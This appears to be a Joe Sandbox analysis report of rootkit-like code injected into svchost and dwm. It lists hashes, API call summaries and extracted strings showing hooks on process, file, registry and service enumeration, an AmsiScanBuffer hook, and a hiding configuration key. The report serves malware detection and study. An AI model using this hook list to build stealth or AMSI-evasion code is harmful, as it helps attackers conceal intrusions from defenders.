                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 4ac3e3435bc240a28e372e584974f9dd1de5cdb4271dbca95e4a4b138f6a69e4
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: 9C11C621B00B9082EE15DB66940D159B7F4FB8AFA5F5D4224DE5A63794EF3CC046C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 63ff9d481e95397834e2372ea7ee673de7580b85bc3560669ddf9eae868a6466
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: FEE0C271B11A4087E708EBA2D81D3597BE5EB8AF69F498024C94A07360DF7D849D8B91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: eaafdf4d04fa0db3b3ce82b686db906f9ee0fc88b57b7922fe41d943d2117609
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 63E0E571B11A4087E708EB62D80D25977B5FF8AF25F488034C90A07320EF3C849D8A11

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered image not preserved; legend: Executed / Not Executed): basic blocks 2baaf2129b0 to 2baaf212a72; API referenced in the graph: NtEnumerateValueKey (two call sites); internal call to 2baaf213c70
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: EnumerateValue
                                                        • String ID:
                                                        • API String ID: 1749906896-0
                                                        • Opcode ID: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction ID: 7309408ef0226acababe7e25447eca8a469459f1eac334046bf6cb404a325249
                                                        • Opcode Fuzzy Hash: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction Fuzzy Hash: E811813730479082EB78DB1AB85461BB3B4F388B94F444225EE89C7794EF35C88AC759

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 4199209b2c061b582fd17b60a4ec86ce2575602945635b3da4a1a40c26b59254
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 6F712E37710A1086EB249F75E86869D37B8FB84B88F001121DE4DC7B69DF3AC949C769

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered image not preserved; legend: Executed / Not Executed): basic blocks 2baaf215f50 to 2baaf2163e6; APIs referenced in the graph: GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache, ResumeThread; plus internal calls to other functions in the same module
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: faa3aef994f2735bfefa3d52832d19c5bb0a04f7c42f0d6d3c76493ec733b772
                                                        • Instruction ID: 853f7b503d2c817fc64b2ab44f2c7e3111b18f7eeda597877c84b76580ded37a
                                                        • Opcode Fuzzy Hash: faa3aef994f2735bfefa3d52832d19c5bb0a04f7c42f0d6d3c76493ec733b772
                                                        • Instruction Fuzzy Hash: 69D19C77208B8881DA749B16E4A835E7BB0F3C8B84F540116EACD87BA5CF3DC545CB19

                                                        Control-flow Graph

                                                        • Control-flow graph (rendered image not preserved; legend: Executed / Not Executed): basic blocks 2baaf2154f0 to 2baaf215afa; APIs referenced in the graph: GetCurrentThreadId, VirtualProtect, GetLastError; plus internal calls to other functions in the same module
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 4fa86ef1d0c8a7d39dbdef65ae79680a6f267e5e3fe5a6c699418147f46d26ed
                                                        • Instruction ID: 908cd434262b72df167c1d4924d3ac3df06bb8f4633a7fd98c99c558dd714be6
                                                        • Opcode Fuzzy Hash: 4fa86ef1d0c8a7d39dbdef65ae79680a6f267e5e3fe5a6c699418147f46d26ed
                                                        • Instruction Fuzzy Hash: 4E02FB37219B8486EB64CB15F4A535AB7B0F3C5790F100116EA8E87BA8DF7DC488CB59

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 25c8acacec8528f1c12d002f9fa98adf4100eaee44a29a606b1e8c17c77e0aab
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: C6113C3670578082EF389B25E4682697371F748F94F040025DE8D87794EF3ECA48C729
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Protect$AllocLibraryLoad
                                                        • String ID:
                                                        • API String ID: 3316853933-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 80d34aad87d105a7e01ab1fbe1eb98c59553cb4cfa4e10ea0f142a24de0a8e9e
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0B91E173B012D087EB688F25D068B79BBA1F754B94F5881269F4A8778CDB3DD842C721

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction ID: df784ed3e95d42e3b42b8af3450d978266208cc608357a861d4930b189560f5c
                                                        • Opcode Fuzzy Hash: d67b081f5b52b9db25ef63bd3fc49ef94c05e675607d2408fbad0ef13c5677fc
                                                        • Instruction Fuzzy Hash: 6431FC33219B8081EE38DA15E06835B77B5F788784F500525B5CD86B98DF6EC948CB2E

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 000002BAAF213631
                                                        • PathFindFileNameW.SHLWAPI ref: 000002BAAF213640
                                                          • Part of subcall function 000002BAAF213C70: StrCmpNIW.SHLWAPI(?,?,?,000002BAAF21255A), ref: 000002BAAF213C88
                                                          • Part of subcall function 000002BAAF213BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213BC6
                                                          • Part of subcall function 000002BAAF213BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213BF4
                                                          • Part of subcall function 000002BAAF213BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213C16
                                                          • Part of subcall function 000002BAAF213BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213C34
                                                          • Part of subcall function 000002BAAF213BB8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAF213657), ref: 000002BAAF213C55
                                                        • CreateThread.KERNELBASE ref: 000002BAAF213687
                                                          • Part of subcall function 000002BAAF211D3C: GetCurrentThread.KERNEL32 ref: 000002BAAF211D47
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: ef56faf1ccb545b8658d3fc8c7fdfc82085f98ac0f5421c0dde815119c8e5451
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 5B11693261064086FF7CAB20A53D35A37B6A754344F804525A806C6290EF7BC94CC63E

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: 7a5fee01b1213345a503af0682c6d2ffec643d6d1f98ca0352beea81c30d0a52
                                                        • Instruction ID: 6c1c517b8b39532bc1570f6a57eea27ecb378881f27f95461f418c508f3e16df
                                                        • Opcode Fuzzy Hash: 7a5fee01b1213345a503af0682c6d2ffec643d6d1f98ca0352beea81c30d0a52
                                                        • Instruction Fuzzy Hash: 71F03037618B0480DA34DB01E46574A77B0F3CC7D4F540111F98D47B69CB3AC298CB19

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002BAAF211628: GetProcessHeap.KERNEL32 ref: 000002BAAF211633
                                                          • Part of subcall function 000002BAAF211628: HeapAlloc.KERNEL32 ref: 000002BAAF211642
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF2116B2
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF2116DF
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF2116F9
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211719
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.KERNELBASE ref: 000002BAAF211734
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211754
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF21176F
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF21178F
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF2117AA
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF2117CA
                                                        • SleepEx.KERNELBASE ref: 000002BAAF211AE3
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF2117E5
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211805
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF211820
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF211840
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF21185B
                                                          • Part of subcall function 000002BAAF211628: RegOpenKeyExW.KERNELBASE ref: 000002BAAF21187B
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.ADVAPI32 ref: 000002BAAF211896
                                                          • Part of subcall function 000002BAAF211628: RegCloseKey.KERNELBASE ref: 000002BAAF2118A0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 52656d555919b3258d329d4c78e2598348f5e3d4728d7a4abf1d47675c7589a9
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 7F21FFB3201A0581FF6C9B66E97936973BDAB44BC0F0454329E09C7699EF36C459C23E
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: 2cdddfb24dcb9e58864d5c7fd66479fd0ae041404f743687f717a93430f7ff31
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: B7314F73205B8086EB649F60E8A47DD7374F784744F44452ADA4E87B98DF39CA4CC729
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 9860fb8d6c2153c2bec71c75c1ad87854f6e26e8922285ef653b20fa1e212338
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 94317E33214B8086EB64CF25E89479E73B0F788754F500126EA8D83BA8DF39C549CB55
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 26e92c23cfc63e0f224c8de2eef51c3944d80d5177babec700e58e84c4514a43
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 20E11273B14B808AE714CF64D4A82DD7BB1F3447C8F148216DE5A97B99EB39C41AC711
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000003.1817613500.000002BAAF1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF1E0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_3_2baaf1e0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 55b62b567fa26138a0f9498a4bc91ff7098edf7196ff50c9a47d77eb3b0ecbd2
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 4151F26371079485EF18CFA2D8486AD3BB1FB58BD8F444526EF0987B89DB3AC041C321

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 000002BAAF211D47
                                                          • Part of subcall function 000002BAAF2120C0: GetModuleHandleA.KERNEL32(?,?,?,000002BAAF211D79), ref: 000002BAAF2120D8
                                                          • Part of subcall function 000002BAAF2120C0: GetProcAddress.KERNEL32(?,?,?,000002BAAF211D79), ref: 000002BAAF2120E9
                                                          • Part of subcall function 000002BAAF215F50: GetCurrentThreadId.KERNEL32 ref: 000002BAAF215F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 21b25b163118572548bccb4b7d857d1436b4f136c2fe903d6f458356e84ab4c3
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: D04192B3111A4AA0FE0CEBA9E87A7D83335A714344F805453A409C75B5DF3A828EC77B
